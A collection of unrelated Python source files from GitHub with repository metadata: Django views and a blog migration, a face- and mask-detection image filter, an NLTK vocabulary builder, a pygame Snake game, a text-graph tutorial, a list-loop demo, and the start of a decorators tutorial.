|
[
"darmawan.jtk04@gmail.com"
] |
darmawan.jtk04@gmail.com
|
187daa4d61a1ac611a58cbcbda03db4114656f11
|
ea71a043e78c2fcbf1e9a39ff11eb39c699edd63
|
/core/views.py
|
4697547485e970b1daab5211e1a32ce427e7ff05
|
[] |
no_license
|
wellvsilva/djangoecommerce
|
fcce49c57def11480b66187ed0343a3b552f81ec
|
1bd9edcc5bd28f3a2721a489d389ef17efd343c7
|
refs/heads/master
| 2021-01-11T04:40:27.050588
| 2016-10-17T14:08:50
| 2016-10-17T14:08:50
| 71,141,786
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 307
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
    """Render the site landing page."""
    return render(request, 'index.html')
def contact(request):
    """Render the contact page."""
    return render(request, 'contact.html')
#def product_list(request):
# return render(request, 'product_list.html')
|
[
"wellvsilva.programador@gmail.com"
] |
wellvsilva.programador@gmail.com
|
e7df89bb363a64317c365f5f45a13d4c5a2e4096
|
a6c40c08da73bb1c65b48ce62ab6d035aa22fb41
|
/cleaner.py
|
bf4b23c67d8b90905f2535e876ce701dd078ceaa
|
[] |
no_license
|
SebasGarcia08/face-extractor
|
f279915a21fce2170f0b266378da10f7626c94a7
|
d999518b27a19b149b43be494ec68578c38ab033
|
refs/heads/master
| 2022-11-04T20:19:15.528249
| 2020-06-10T15:55:30
| 2020-06-10T15:55:30
| 269,957,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,456
|
py
|
from argparse import ArgumentParser
import insightface
import cv2
import os
import logging
import traceback
import shutil
from tqdm import tqdm, tqdm_gui
import time
import numpy as np
import tensorflow as tf
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
import multiprocessing
from multiprocessing import Pool
from p_tqdm import p_map
import sys
def main(args):
    """Walk args['INPUT_BASE_DIR'], detect faces with the module-level
    `model`, and copy/move/crop matching images into args['OUTPUT_PATH'].

    Relies on globals set in the __main__ block: `model` (face detector)
    and, when filtering for masked faces, `maskNet` (mask classifier).

    NOTE(review): indentation below was reconstructed from a flattened
    source; confirm nesting against the original before relying on it.
    """
    logging.info(' Reading files in {}'.format(args["INPUT_BASE_DIR"]))
    if not args["save_in_same_output_folder"]:
        # Mirror the input directory tree under the output path.
        copyDirectoryStructure(args["INPUT_BASE_DIR"], args["OUTPUT_PATH"])
    else:
        if os.path.exists(args["OUTPUT_PATH"]):
            logging.error(" {} path already exists".format(args["OUTPUT_PATH"]))
            return
        else:
            os.mkdir(args["OUTPUT_PATH"])
    try:
        if os.path.exists(args["INPUT_BASE_DIR"]):
            # Progress counters.
            num_imgs = 0
            num_faces_detected = 0
            num_images_filtered = 0
            num_masked_faces_detected = 0  # NOTE(review): never updated below
            # First pass: count files so tqdm can show a total.
            for dirpath, _, filenames in os.walk(args["INPUT_BASE_DIR"]):
                for filename in filenames:
                    num_imgs += 1
            pbar = tqdm(total=num_imgs, desc="Progress", unit="Images")
            pbar.write(f"{num_imgs} images found")
            # Second pass: run detection image by image.
            for img_number, (dirpath, _, filenames) in enumerate(os.walk(args["INPUT_BASE_DIR"])):
                for filename in filenames:
                    try:
                        # Path of the file relative to the input root.
                        partialPath = os.path.sep.join([ dirpath[ len(args["INPUT_BASE_DIR"]): ], filename ])
                        src = os.path.sep.join([args["INPUT_BASE_DIR"], partialPath])
                        img = cv2.imread(src)
                        img = cv2.resize(img, (255, 255))
                        bbox, _ = model.detect(img, threshold=0.5, scale=1.0)
                        if len(bbox) > 0:
                            num_images_filtered += 1
                            if args["save_in_same_output_folder"]:
                                out = os.path.sep.join([args["OUTPUT_PATH"], filename])
                            else:
                                out = os.path.sep.join([args["OUTPUT_PATH"], partialPath])
                            if args["keep_only_imgs_with_faces"]:
                                # Keep the whole image because it contains a face.
                                if args["move_images"]:
                                    shutil.move(src, out)
                                else:
                                    cv2.imwrite(out, img)
                            elif args["crop_faces"] or args["keep_only_imgs_with_masked_faces"]:
                                current_num_faces_detected = 0
                                faces = []
                                croppedImages = []
                                for box in bbox:
                                    try:
                                        if args["keep_only_imgs_with_masked_faces"]:
                                            x,y,w,h,_ = list(map(int, box))
                                            imgCrop = img[y:y+h,x:x+w]
                                            croppedImages.append(imgCrop)
                                            # Preprocess the crop for the mask classifier.
                                            face = cv2.cvtColor(imgCrop, cv2.COLOR_BGR2RGB)
                                            face = cv2.resize(face, (224, 224))
                                            face = img_to_array(face)
                                            face = preprocess_input(face)
                                            face = np.expand_dims(face, axis=0)
                                            faces.append(face)
                                    except Exception as e:
                                        # logging.error(traceback.format_exc())
                                        pbar.write(traceback.format_exc())
                                saveImg = True
                                if len(faces) > 0:
                                    preds = maskNet.predict(faces)
                                    for i, (imgCrop, pred) in enumerate(zip(croppedImages, preds)):
                                        out = out.replace(".jpg","")
                                        out += f"face_No{str(i+1)}.jpg"
                                        saveCroppedImg = True
                                        if args["crop_faces"]:
                                            if args["keep_only_imgs_with_masked_faces"]:
                                                # Keep the crop only if mask probability > 0.3.
                                                pMask, pNotMask = np.squeeze(pred)
                                                saveCroppedImg = pMask > .3
                                            if saveCroppedImg:
                                                try:
                                                    imgCrop = cv2.resize(imgCrop, (224,224)) #this resizing could rise exception
                                                    cv2.imwrite(out, imgCrop)
                                                    num_faces_detected += 1
                                                    current_num_faces_detected += 1
                                                except:
                                                    try:
                                                        cv2.imwrite(out, imgCrop) # if so, then save images as is, iwithout resizing
                                                        num_faces_detected += 1
                                                        current_num_faces_detected += 1
                                                    except Exception as e:
                                                        pbar.write(str(e))
                                            else:
                                                saveImg = False
                                    if args["duplicate_img_of_faces"]:
                                        # Optionally also keep the source image of the faces.
                                        if args["keep_only_imgs_with_masked_faces"]:
                                            if len(faces) == 1 and saveImg:
                                                if args["move_images"]:
                                                    shutil.move(src, out)
                                                else:
                                                    cv2.imwrite(out, img)
                                        else:
                                            if args["move_images"]:
                                                shutil.move(src, out)
                                            else:
                                                cv2.imwrite(out, img)
                                if args["crop_faces"]:
                                    s = " masked" if args["keep_only_imgs_with_masked_faces"] else " "
                                    msg = f"Detected{s} faces: {current_num_faces_detected} - Total: {num_faces_detected} - Percentage of faces over images: {(num_faces_detected/(img_number+1))*100}%"
                                    pbar.write(msg)
                                else:
                                    # NOTE(review): divides by img_number, which is 0 for the first directory.
                                    pbar.write(f"Filtered images: {num_images_filtered} - Percemtage of saved images: {(num_images_filtered/img_number)*100}%")
                        pbar.update(1)
                    except Exception as e:
                        pbar.write(str(e))
        else:
            raise FileNotFoundError("Path does not exists")
    except Exception as e:
        # Level 40 == logging.ERROR.
        logging.log(40, traceback.format_exc())
def yieldPaths(input_path, output_path, flat=False):
    """Yield (source, destination) path pairs for every file under input_path.

    When flat is True every destination lands directly in output_path;
    otherwise the relative directory structure is mirrored under it.
    """
    for folder, _, names in os.walk(input_path):
        rel_dir = folder[len(input_path):]
        for name in names:
            rel_path = os.path.sep.join([rel_dir, name])
            source = os.path.sep.join([input_path, rel_path])
            if flat:
                dest = os.path.sep.join([output_path, name])
            else:
                dest = os.path.sep.join([output_path, rel_path])
            yield (source, dest)
def copyDirectoryStructure(base_path, output_path):
    """Recreate the directory tree of base_path under output_path.

    Interactive: when a target directory already exists the user is asked
    whether to overwrite it ('yesAll' switches to makedirs(exist_ok=True)
    for the remainder; 'noAll' or an invalid answer aborts the walk).
    """
    if os.path.exists(base_path):
        res = "yes"
        for dirpath, _ , _ in os.walk(base_path):
            # Target path: output root plus the path relative to base_path.
            structure = os.path.sep.join([ output_path, dirpath[ len(base_path): ] ])
            try:
                logging.info(" Creating {} path".format(structure))
                if res == "yesAll":
                    os.makedirs(structure, exist_ok=True)
                else:
                    os.mkdir(structure)
            except FileExistsError:
                msg = "Path {} already exists, do you want to overwrite it? [yes/no/yesAll/noAll]: ".format(structure)
                res = input(msg)
                if res == "noAll":
                    break
                if res != "yes" and res != "no" and res != "yesAll" and res != "noAll":
                    print("Invalid choice")
                    break
    else:
        logging.error("File does not exists")
def copyFile(src, dst, buffer_size=10485760, perserveFileDate=True):
    '''
    From: https://blogs.blumetech.com/blumetechs-tech-blog/2011/05/faster-python-file-copy.html
    Copies a file to a new location. Much faster performance than Apache Commons due to use of larger buffer
    @param src: Source File
    @param dst: Destination File (not file path)
    @param buffer_size: Buffer size to use during copy
    @param perserveFileDate: Preserve the original file date

    NOTE(review): relies on shutil internals (`shutil._samefile`,
    `shutil.stat`, `shutil.SpecialFileError`) which are private / re-exports
    and may change between Python versions — confirm before upgrading.
    '''
    # Check to make sure destination directory exists. If it doesn't create the directory
    dstParent, dstFileName = os.path.split(dst)
    if(not(os.path.exists(dstParent))):
        os.makedirs(dstParent)
    # Optimize the buffer for small files
    buffer_size = min(buffer_size,os.path.getsize(src))
    if(buffer_size == 0):
        buffer_size = 1024
    if shutil._samefile(src, dst):
        raise shutil.Error("`%s` and `%s` are the same file" % (src, dst))
    for fn in [src, dst]:
        try:
            st = os.stat(fn)
        except OSError:
            # File most likely does not exist
            pass
        else:
            # XXX What about other special files? (sockets, devices...)
            if shutil.stat.S_ISFIFO(st.st_mode):
                raise shutil.SpecialFileError("`%s` is a named pipe" % fn)
    # Buffered copy, then optionally carry over the file timestamps/mode.
    with open(src, 'rb') as fsrc:
        with open(dst, 'wb') as fdst:
            shutil.copyfileobj(fsrc, fdst, buffer_size)
    if(perserveFileDate):
        shutil.copystat(src, dst)
def countImages(input_path):
    """Return the total number of files below input_path (recursive)."""
    return sum(len(names) for _, _, names in os.walk(input_path))
def write(msg):
    """Rewrite the current stderr line in place (carriage return, no newline)."""
    sys.stderr.write('\r{}'.format(msg))
def run(src, out):
    """Detect faces in src and keep the image in out when any are found.

    NOTE(review): broken as written — this module-level function references
    `self.model`, `self.write`, `self.copyFile` and the free names
    `move_files`, `num_filtered_images` and `img_number`, none of which
    exist in this scope. It reads like a method lifted out of a class and
    would raise NameError if called; confirm intent before use.
    """
    try:
        img = cv2.imread(src)
        img = cv2.resize(img, (255, 255))
        bbox, _ = self.model.detect(img, threshold=0.5, scale=1.0)
        if len(bbox) > 0:
            if move_files:
                shutil.move(src, out)
            else:
                self.copyFile(src, out)
            num_filtered_images += 1
            ratio = round((self.num_filtered_images / (img_number + 1)) * 100, 3)
            self.write("Filtered imgs: {}| % Imgs saved: {}".format( self.num_filtered_images, ratio))
    except Exception as e:
        self.write(str(e))
def filterFace():
    # TODO: unimplemented placeholder — no body was ever written.
    pass
if __name__ == '__main__':
    # Initialize parser
    parser = ArgumentParser(
        description="Script for detecting faces in a given folder and its subdirectories"
    )
    parser.add_argument("-in", "--input-path",
                        type=str,
                        required=True,
                        dest="INPUT_BASE_DIR",
                        help="Path to the directory where images or folders of images are\n")
    parser.add_argument("-out","--output-path",
                        type=str,
                        required=True,
                        dest = "OUTPUT_PATH",
                        help="Path of the folder where faces images will be saved\n")
    # Exactly one keeping criterion must be chosen.
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("--keep-faces",
                       action="store_true",
                       dest="keep_only_imgs_with_faces",
                       help = "Set the keeping criteria to images with faces. Whether to keep images stored from [-out, --output-path] to [-in, --input-path] only if contain faces")
    group.add_argument("--keep-faces-with-mask",
                       action="store_true",
                       dest="keep_only_imgs_with_masked_faces",
                       help = "Set the keeping criteria to images with faces that wear mask. Whether to keep images stored from [-out, --output-path] to [-in, --input-path] only if contain faces with mask")
    parser.add_argument("-move", "--move-kept-images",
                        action="store_true",
                        default=False,
                        dest = "move_images",
                        help = "Whether to move kept images from [-in, --input-path] to [-out, --output-path] in such a way that in the remaining images in [-in --input-path] are the ones that did not apply the criteria.")
    parser.add_argument("-crop","--crop-faces",
                        action='store_true',
                        dest="crop_faces",
                        default=False,
                        help="Crop faces detected in images and save each one\n")
    parser.add_argument("-flat", "--same-out-dir",
                        action='store_true',
                        dest="save_in_same_output_folder",
                        default=False,
                        help="Whether to save all images in dirctory specified in -out --output-path and not imitate directory structure from the path specified in -indir --input-base-dir\n")
    parser.add_argument("-duplicate", "--duplicate-img-faces",
                        action="store_true",
                        dest="duplicate_img_of_faces",
                        default=False,
                        help="Whether to save the original images of the extracted faces also. Only valid if -crop --crop-faces is passed as argument")
    parser.add_argument("-model", "--classification-model",
                        type=str,
                        dest = "classification_model",
                        default="resources/model_with_1400_masked_samples.h5")
    kwargs = vars(parser.parse_args())
    logging.basicConfig(level=logging.INFO)
    logging.info(" Preparing model...")
    # Face detector used as a module-level global by main().
    model = insightface.model_zoo.get_model('retinaface_r50_v1')
    model.prepare(ctx_id = -1, nms=0.4)
    if kwargs["keep_only_imgs_with_masked_faces"]:
        logging.info(" Loading classification model...")
        # Mask classifier, also consumed as a global by main().
        maskNet = tf.keras.models.load_model(kwargs["classification_model"], compile=False)
    # Bug fix: the script defined main() but called the non-existent main2(),
    # which raised NameError on every run.
    main(kwargs)
|
[
"segaracos@outlook.com"
] |
segaracos@outlook.com
|
d8620bee26ddf112e526f48d44d148a31175bc96
|
87fe3804869e2443c14317d766a5f8716afcd5d5
|
/scripts/form_vocab.py
|
91f0f437c6d7c6af9304603454eb1f3585f4c7c5
|
[] |
no_license
|
heidonomm/mhopRL
|
dbfd296dddf87507f6bb19d58b459a4df181ea57
|
93db4dda4646412f1783a6e05f9b779005539a2f
|
refs/heads/master
| 2023-04-15T04:56:44.464898
| 2021-04-16T07:29:20
| 2021-04-16T07:29:20
| 344,776,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,936
|
py
|
import nltk
from nltk import word_tokenize
from nltk import WordNetLemmatizer
import json
import string
# q_string = '{"id": "3NGI5ARFTT4HNGVWXAMLNBMFA0U1PG", "question": {"stem": "Climate is generally described in terms of what?", "choices": [{"text": "sand", "label": "A"}, {"text": "occurs over a wide range", "label": "B"}, {"text": "forests", "label": "C"}, {"text": "Global warming", "label": "D"}, {"text": "rapid changes occur", "label": "E"}, {"text": "local weather conditions", "label": "F"}, {"text": "measure of motion", "label": "G"}, {"text": "city life", "label": "H"}]}, "answerKey": "F", "fact1": "Climate is generally described in terms of temperature and moisture.", "fact2": "Fire behavior is driven by local weather conditions such as winds, temperature and moisture.", "combinedfact": "Climate is generally described in terms of local weather conditions", "formatted_question": "Climate is generally described in terms of what? (A) sand (B) occurs over a wide range (C) forests (D) Global warming (E) rapid changes occur (F) local weather conditions (G) measure of motion (H) city life"}'
# q_json = json.loads(q_string)
# def state_rep_generator(q_obj):
# state = ""
# elements = list()
# elements.append(preprocess(q_obj["stem"]))
# for choice in q_obj['choices']:
# print(choice['text'])
# elements.append((preprocess(choice['text'])))
# print(elements)
# return "<|>".join(elements)
def preprocess(text):
    """Tokenise text and return lower-cased, alphabetic, lemmatised tokens."""
    lemma = WordNetLemmatizer()
    tokens = word_tokenize(text)
    # Drop punctuation and numeric tokens.
    tokens = [token for token in tokens if token.isalpha()]
    # Lemmatise each token first as a verb, then as a noun.
    tokens = [lemma.lemmatize(word.lower(), pos="v") for word in tokens]
    tokens = [lemma.lemmatize(word.lower(), pos="n") for word in tokens]
    return tokens
# print(state_rep_generator(q_json['question']))
# Seed the vocabulary with the single ASCII lowercase letters — presumably
# so that answer-choice labels (a–h) are always in-vocabulary; confirm.
vocab_set = set()
for letter in string.ascii_lowercase:
    vocab_set.add(letter)
# with open("data/QASC_Dataset/dev.jsonl", "r") as in_dev_file, open("toy_data/dev_norm_unique_predicates.txt", "r") as in_pred_file, open("word_vocab.txt", "w") as out_file:
# for line in in_dev_file:
# line = json.loads(line)
# for stem_word in preprocess(line["question"]["stem"]):
# vocab_set.add(stem_word)
# # vocab_set.add(word for word in preprocess(line["question"]["stem"]))
# # choices = [preprocess(choice["text"]) for choice in line["question"]["choices"]]
# for choice in line["question"]["choices"]:
# for choice_word in preprocess(choice["text"]):
# vocab_set.add(choice_word)
# # vocab_set.add(word for word in preprocess(choice["text"]))
# for index, line in enumerate(in_pred_file):
# for word in preprocess(line):
# vocab_set.add(word)
# # vocab_set.add(word for word in preprocess(line))
# for word in vocab_set:
# # print(word)
# out_file.write(f"{word}\n")
|
[
"heidonomm@gmail.com"
] |
heidonomm@gmail.com
|
905d02d242aba18398fcd2c714f97a9507bde437
|
424c3cff38aab3895a277de6a08dc0592ecd42e7
|
/main.py
|
44158692bb56951d5b8312b0c986e74fc8eb21bf
|
[] |
no_license
|
kevinjavila/Snake-Game
|
90718497961d92c268da8ebd5255eb080cc975d2
|
78bc5ba524662209a2a95510839bcd52f7b322c1
|
refs/heads/master
| 2023-08-26T06:57:57.485186
| 2021-10-26T21:05:07
| 2021-10-26T21:05:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,748
|
py
|
import random
import pygame
class Cube:
    """One grid cell of the snake (or the snack): position, direction, colour."""
    # Grid dimensions shared by all cubes (w x w window split into rows cells).
    rows = 20
    w = 500

    def __init__(self, start, dirnx=1, dirny=0, color=(255, 0, 0)):
        """start: (col, row) grid position; dirnx/dirny: initial direction."""
        self.pos = start
        # Bug fix: the original ignored its dirnx/dirny parameters and always
        # hard-coded 1 and 0; honour the caller-supplied direction instead.
        # Existing callers never pass them, so the defaults keep behaviour
        # unchanged for current code.
        self.dirnx = dirnx
        self.dirny = dirny
        self.color = color

    def move(self, dirnx, dirny):
        """Set the direction and advance the cube one cell in that direction."""
        self.dirnx = dirnx
        self.dirny = dirny
        self.pos = (self.pos[0] + self.dirnx, self.pos[1] + self.dirny)

    def draw(self, surface, eyes=False):
        """Draw the cube onto surface; draw eyes too when this is the head."""
        dis = self.w // self.rows
        i = self.pos[0]
        j = self.pos[1]
        pygame.draw.rect(surface, self.color, (i*dis+1, j*dis+1, dis - 2, dis - 2)) # Drawing inside squares
        if eyes:
            center = dis // 2
            radius = 3
            circle_middle = (i*dis+center-radius, j*dis+8)
            circle_middle1 = (i*dis+dis-radius*2, j*dis+8)
            pygame.draw.circle(surface, (0,0,0), circle_middle, radius)
            pygame.draw.circle(surface, (0,0,0), circle_middle1, radius)
class Snake:
    """The player snake: a list of Cube segments plus pending turn points."""

    def __init__(self, color, pos):
        # Bug fix: `body` and `turns` used to be *class* attributes, so all
        # Snake instances shared one list/dict and creating a second snake
        # (e.g. on restart) kept the old segments. They are now per-instance.
        self.body = []
        self.turns = {}
        self.color = color
        # Keeping track of head at position
        self.head = Cube(pos)
        self.body.append(self.head)
        # Directions for moving snake
        self.dirnx = 0
        self.dirny = 1

    def move(self):
        """Read input, record turns at the head, and advance every segment."""
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
        # Holding the key values that can be pressed
        keys = pygame.key.get_pressed()
        for key in keys:
            if keys[pygame.K_LEFT]:
                self.dirnx = -1
                self.dirny = 0
                # Setting key (current head) == where we turned
                self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
            if keys[pygame.K_RIGHT]:
                self.dirnx = 1
                self.dirny = 0
                # Setting key (current head) == where we turned
                self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
            if keys[pygame.K_UP]:
                self.dirnx = 0
                self.dirny = -1
                # Setting key (current head) == where we turned
                self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
            if keys[pygame.K_DOWN]:
                self.dirnx = 0
                self.dirny = 1
                # Setting key (current head) == where we turned
                self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
        for i, c in enumerate(self.body):
            p = c.pos[:]  # position
            if p in self.turns:
                turn = self.turns[p]
                c.move(turn[0], turn[1])
                # If on last cube, remove turn
                if i == len(self.body) - 1:
                    self.turns.pop(p)
            else:
                # Checking whether we are on edge of screen (wrap around).
                if c.dirnx == -1 and c.pos[0] <= 0: # if on left side edge, come through right side edge
                    c.pos = (c.rows - 1, c.pos[1])
                elif c.dirnx == 1 and c.pos[0] >= c.rows - 1: # if on right side edge, come through left side
                    c.pos = (0, c.pos[1])
                elif c.dirny == 1 and c.pos[1] >= c.rows - 1: # if on down side edge, come through up side edge
                    c.pos = (c.pos[0], 0)
                elif c.dirny == -1 and c.pos[1] <= 0: # if on up side edge, come through down side edge
                    c.pos = (c.pos[0], c.rows - 1)
                else:
                    c.move(c.dirnx, c.dirny) # else keep moving

    def add_cube(self):
        """Grow the snake by one cube attached behind the current tail."""
        tail = self.body[-1]
        dx, dy = tail.dirnx, tail.dirny
        # Checking direction of the tail so cube can be added properly
        if dx == 1 and dy == 0:
            self.body.append(Cube((tail.pos[0] - 1, tail.pos[1]))) # Right
        elif dx == -1 and dy == 0:
            self.body.append(Cube((tail.pos[0] + 1, tail.pos[1]))) # Left
        elif dx == 0 and dy == 1:
            self.body.append(Cube((tail.pos[0], tail.pos[1] - 1))) # Down
        elif dx == 0 and dy == -1:
            self.body.append(Cube((tail.pos[0], tail.pos[1] + 1))) # Up
        self.body[-1].dirnx = dx
        self.body[-1].dirny = dy

    def draw(self, surface):
        """Draw every segment; the head (index 0) gets eyes."""
        for i, c in enumerate(self.body):
            if i == 0:
                c.draw(surface, True)
            else:
                c.draw(surface)
def draw_grid(width, rows, surface):
    """Draw the white grid lines of the play field onto surface."""
    size_between = width // rows
    x = 0
    y = 0
    for line in range(rows):
        x += size_between
        y += size_between
        # Draw lines for each iteration of loop
        pygame.draw.line(surface, (255,255,255), (x,0), (x, width)) # vertical line
        pygame.draw.line(surface, (255, 255, 255), (0, y), (width, y)) # horizontal line
def redraw_window(surface):
    """Clear the window, redraw snake, snack and grid, then flip the display.

    Reads the module-level globals set up in main().
    """
    global rows, width, s, snack
    surface.fill((0, 0, 0))
    s.draw(surface)
    snack.draw(surface)
    draw_grid(width, rows, surface)
    pygame.display.update()
def random_snack(rows, item):
    """Pick a uniformly random grid cell not occupied by item's body.

    Retries until a free (x, y) cell inside the rows x rows grid is found.
    """
    while True:
        candidate = (random.randrange(rows), random.randrange(rows))
        # Accept the cell only when no body segment sits on it.
        if all(cube.pos != candidate for cube in item.body):
            return candidate
def main():
    """Initialise pygame and run the game loop at ~10 FPS until collision."""
    global width, rows, s, snack
    pygame.init()
    pygame.display.set_caption("Snake")
    width = 500
    rows = 20
    win = pygame.display.set_mode((width, width))
    flag = True
    # Starting in the middle
    s = Snake((255, 0, 0), (10, 10))
    snack = Cube(random_snack(rows, s), color = (0,255,0))
    clock = pygame.time.Clock()
    while flag:
        # Delaying the game so it's not as fast
        pygame.time.delay(50)
        clock.tick(10) # limiting to 10 fps
        s.move()
        # Eating the snack: grow and respawn it on a free cell.
        if s.body[0].pos == snack.pos:
            s.add_cube()
            snack = Cube(random_snack(rows, s), color = (0,255,0))
        # Checking for the collision
        for i in range(len(s.body)):
            # Using map to apply function lambda (variable z) to each item in s.body list
            if s.body[i].pos in list(map(lambda z:z.pos, s.body[i + 1:])):
                print("Score:", len(s.body))
                flag = False
        redraw_window(win)
    pass

main()
|
[
"kevinavila32@gmail.com"
] |
kevinavila32@gmail.com
|
3d07ff6fbbfb99a178b400de391131d5e603ea46
|
f389fb4ffdbdd71c108559ecbd269304706ef7c3
|
/tutorial3/tutorial3.py
|
c287234fad183ee5484e4dd94c18c31289128b2f
|
[] |
no_license
|
petrLorenc/School-web-data-mining-tutorials
|
a04176add4cde37a0fec4d24f050d2169af52a18
|
d3d0c0a9e6945ac08fdd8f0b36661b9023ade044
|
refs/heads/master
| 2021-01-21T12:01:37.023238
| 2017-05-19T06:25:46
| 2017-05-19T06:25:46
| 91,772,927
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
# Tokenise a text file, build a graph from it and export it for Gephi.
import nltk
# Bug fix: the code below uses the `nx` alias, but the module was imported
# as plain `networkx`, so every nx.* call raised NameError.
import networkx as nx
# Bug fix: `plt` and `graphviz_layout` were used but never imported.
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout

# input text
text = None
with open('text.txt', 'r') as f:
    text = f.read()

# process text and convert to a graph
sentences = [[t for t in nltk.word_tokenize(sentence)] for sentence in nltk.sent_tokenize(text)]
G = nx.Graph()
# G.add_node(...
# G.add_edge(...
# ...

# visualise
plt.figure(figsize=(20,10))
pos = graphviz_layout(G, prog="fdp")
nx.draw(G, pos,
    labels={v:str(v) for v in G},
    cmap = plt.get_cmap("bwr"),
    node_color=[G.degree(v) for v in G],
    font_size=12
)
plt.show()

# write to GEXF
nx.write_gexf(G, "export.gexf")
|
[
"petr.lorenc@firma.seznam.cz"
] |
petr.lorenc@firma.seznam.cz
|
cef0851b730719e6ec2ecdb6c1260034484790a2
|
ce6df0cd2a21fd98d2a58793816f8be09658c73a
|
/loop.py
|
98c95cd9761441e221a66e2e76c2e57395b90e8e
|
[] |
no_license
|
MikeTheFyke/Python
|
5ee6de684a0985fb28829da16982fe039884426e
|
5fde6be8e8f1c5b90028a5dcd5f39bc149cdaca4
|
refs/heads/master
| 2021-01-05T09:00:08.564586
| 2020-03-03T21:47:05
| 2020-03-03T21:47:05
| 240,965,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,517
|
py
|
# Demo script: list iteration, string building, and a doubling loop.
rockosML = [
    "Rocko Rama",
    "Spunky",
    "Heffer Wolfe",
    "Ed BigHead",
    "Bev BigHead",
    "Filburt Turtle",
    "Earl The Dog",
    "Paula Hutchison"
]
print("\n--This is the start of the list--")
# Indenting in Python can define end points for for loops.
for name in rockosML:
    # Bug fix: `print name` is Python 2 syntax and a SyntaxError under
    # Python 3; the rest of the script already uses print() calls.
    print(name)
print("---This is the end of the list---\n")
# Mass Uppercasing by using The Append method to save changed data into new Array
print("\nThe same list but all in CAPS\n")
upperNames = []
for name in rockosML:
    name = name.upper()
    upperNames.append(name)
print(upperNames)
print("\n ---The End Is Here--- \n")
# Directions Loop
print("\nLet's Get You Moving\n")
directions = [
    "turn left",
    "go straight",
    "turn right",
    "keep going until you see the dog statue",
    "turn right",
    "turn right again",
    "park right on the sidewalk"
]
instructions = "First "
for nextDirection in directions:
    instructions = instructions + nextDirection + ", then \n"
print(instructions + "\nYou Have Arrived :)\n")
# Bacteria Loop using the range method, 10 iterations in my example
# using time.sleep method to create a pause between iterations.
print("\nWelcome to The Bacteria Zone\n")
# imported time method
import time
bacteria = "&"
generations = 10
for generation in range(0, generations):
    # bacteria = bacteria + bacteria - replaced to show strings can be mulitplied
    bacteria = bacteria * 2
    print(bacteria)
    time.sleep(0.5)
print("\nThank You Come Again\n")
|
[
"mikefyke@hotmail.com"
] |
mikefyke@hotmail.com
|
21c08f1cc6e33c90dd171f8ca67a5a0a1ef54b06
|
4f2dd2feb3d7a62c382534a563e4d823a324e5d9
|
/src/imgUpload/views.py
|
3038919b64f4ecdd9fa25f5b24356148eed74dc9
|
[
"MIT"
] |
permissive
|
codezerro/Django-Dev-To-Development-2
|
fc727d72fea3af19e15bc42429a50e159760252b
|
5e0780d2bdd8d3c5526a7cf813b14216336ed5f2
|
refs/heads/master
| 2022-12-21T23:29:35.655252
| 2020-09-22T02:31:49
| 2020-09-22T02:31:49
| 296,371,171
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
from django.shortcuts import render
# Create your views here.
def imgCompress(request):
    """Render the image-upload landing page for the given request."""
    template_name = 'imgupload/index.html'
    return render(request, template_name)
|
[
"kabircp08@gmail.com"
] |
kabircp08@gmail.com
|
ae30769610e5c080ac853d5fd9ad989664a4ac12
|
260aa7c38bfbae2bf7bdc17ab4e178f93bd60ec6
|
/week8/Simple Project/blog/migrations/0001_initial.py
|
781ab23cd2d83f79a2b17f7edffbccb747435a06
|
[] |
no_license
|
Orik236/Web_Orka236
|
0fe177febe193821f62cf3687865a11799662e13
|
49ddf61de35213be490b4aa08ad041231fe584e7
|
refs/heads/master
| 2023-01-09T22:22:40.846945
| 2020-04-16T22:47:38
| 2020-04-16T22:47:38
| 247,916,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,048
|
py
|
# Generated by Django 2.2.11 on 2020-03-16 18:07
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # Auto-generated initial migration that creates the blog Post model.
    initial = True
    dependencies = [
        # Depends on whatever user model the project configures (AUTH_USER_MODEL).
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField()),
                # NOTE(review): the default is the timestamp frozen at makemigrations
                # time (2020-03-16), not "now" — every Post created without an explicit
                # created_date gets this same fixed value.  Verify the model intended
                # timezone.now rather than a constant.
                ('created_date', models.DateTimeField(default=datetime.datetime(2020, 3, 16, 18, 7, 32, 353192, tzinfo=utc))),
                ('published_date', models.DateTimeField(blank=True, null=True)),
                # Deleting the author cascades and deletes their posts.
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"orik236@gmail.com"
] |
orik236@gmail.com
|
93c947a317a1de8748f771cbb780924f92ae327a
|
ece7df4bc7425be27a55dc74f64c8d360454efb0
|
/01_functions_are_objects.py
|
6f911c0b6382b7a4a403190bc6a9b42f008389d6
|
[] |
no_license
|
zacniewski/Decorators_intro
|
81321334fbce5638e0735e3c59a767bac3bd2d5a
|
e51a9ebcedcea29ac18d075747bd16a047c7af05
|
refs/heads/master
| 2021-01-14T11:25:34.143649
| 2014-01-02T10:54:08
| 2014-01-02T10:54:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 678
|
py
|
# Demo: functions are first-class objects — they can be assigned to names,
# aliased, and deleted like any other object.
# Fixed: the original used Python-2-only syntax (print statements and
